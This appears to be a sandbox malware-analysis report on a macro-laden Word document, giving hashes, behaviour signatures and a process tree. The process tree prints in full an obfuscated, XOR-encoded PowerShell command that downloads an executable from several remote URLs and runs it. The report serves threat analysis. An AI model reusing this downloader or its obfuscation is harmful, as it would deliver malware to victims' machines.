Analysis

  • max time kernel
    101s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    21-09-2024 03:23

General

  • Target

    eefab844f33676eedccdb53d09db6922_JaffaCakes118.doc

  • Size

    84KB

  • MD5

    eefab844f33676eedccdb53d09db6922

  • SHA1

    564da08abc1968d87af8a38415ea4b621e72d47b

  • SHA256

    21a401d8f6056563b4407523c1ac95dfa0d840bd650bbd1cc00cdaf6fecf26e6

  • SHA512

    fdd9c702950440af1e9b23065385fa594f17669c6d2addb06011f12c8f393ba6016beaaaafc051c3ad78445c86201d5bf4e728292d5935effacd24ba9cba6e94

  • SSDEEP

    1536:A4hGD1YOki98+agvtPj7R44h4+ZXBukGgWX7R:0D1vTdj7Bi+ZRuTgWV

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eefab844f33676eedccdb53d09db6922_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\POwerSHell.exe
        POwerSHell &( $pSHome[21]+$psHOmE[30]+'x')( "$(SEt-iTEM 'VaRIAbLe:OFs' '')" +[STRING]( '11@97,122w95w64s123L85@15L18e15A65A74M88,2A64L77,69@74e76L91M15e93w78G65L75@64G66L20s11@105k106L96A69M67@76s15,18@15,65k74G88L2A64A77e69e74s76G91k15e124@86,92G91L74e66s1s97@74M91@1w120e74G77@108G67,70,74M65A91G20M11M92w120@106L90k78@15s18,15A8M71A91,91L95s21L0k0w75w64s67,90k64,65s72w71G70s74e90G94A90@78A1,76w64,66M0e122A125@103w75k122A124k127e123@85A22s0A111L71G91k91e95w21w0@0s92,86A65A74w93L72L86@76L78G95e70k91A78@67M1k69L95@0s95k103A101G126,103,127s25@0A111k71w91w91M95w21e0,0e88M88@88G1k66L74@64A71A78A86A77@64e91e90w70k1M76M64e66w0,94G102e91G69k104k102@0k111k71M91L91M95L21e0M0@70s95k71s64L65s74G92A1s77s70s75e0e101M72,105e124L92s89@75,28k0s111@71w91A91@95k21k0s0w88G88L88e1M64M66e90G93L66k78k68w70L65@78,1G65e74G91s0k106M31L126G87G70@24,70A121M107k124e0e8w1s124,95e67w70k91w7w8w111L8e6M20A11w70G95G127,106,69M110@15s18s15@11A97A122M95s64w123A85s1w65w74e87s91w7A30A3G15L27e31L23G27A26L27s6k20k11L117s71w88s101M69s15s18M15@11A74w65A89@21L91M74M66w95A15@4,15M8k115s8w15G4k15M11k70G95s127w106G69s110A15w4A15e8@1,74e87w74e8L20w73,64G93G74e78G76A71M7@11,118@75L94k64w124k15M70s65G15,11G92e120e106w90w78A6,84k91G93G86e84@11k105k106A96A69A67@76G1G107k64e88A65w67,64e78,75L105k70M67A74w7@11G118@75e94k64A124L1e123L64L124G91w93e70A65w72M7A6G3,15w11,117A71e88A101w69A6M20M124e91s78A93G91M2M127@93A64L76,74e92M92L15A11k117M71e88@101s69w20L77k93,74M78A68A20k82@76s78s91A76G71e84@88M93s70,91s74,2L71L64L92,91G15G11L112s1@106M87M76A74@95L91,70s64,65k1M98L74e92G92k78@72A74w20L82e82'.sPLIt( ',@AMGekwsL' ) |fOreACH{ [chaR]($_ -BxOr '0x2f') }) +"$( sEt-ITeM 'VARIABlE:Ofs' ' ' ) ")
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2580

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      3277670a582d934ddc8f02d5b31902f9

      SHA1

      85b3d5302ab00e73d8d362f81949dc1b9b42979b

      SHA256

      ec380f755f26e0ea0ef3cfb628b31fde2d38c64eda12367fcfbeaa304416e6de

      SHA512

      8e7428186f85f622964c36b6d1e837b2d82dbc3b614d2ebfe94d634c9d4a07704d16c4160fd4e6648c7dd069b87c7e50199c5d6989b076add5131e171712e945

    • memory/2380-87-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-2-0x000000007171D000-0x0000000071728000-memory.dmp

      Filesize

      44KB

    • memory/2380-13-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-71-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-88-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-0-0x000000002F171000-0x000000002F172000-memory.dmp

      Filesize

      4KB

    • memory/2380-97-0x000000007171D000-0x0000000071728000-memory.dmp

      Filesize

      44KB

    • memory/2380-98-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-99-0x00000000065E0000-0x00000000066E0000-memory.dmp

      Filesize

      1024KB

    • memory/2380-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2380-114-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2380-115-0x000000007171D000-0x0000000071728000-memory.dmp

      Filesize

      44KB

    • memory/2580-92-0x00000000056F0000-0x0000000005748000-memory.dmp

      Filesize

      352KB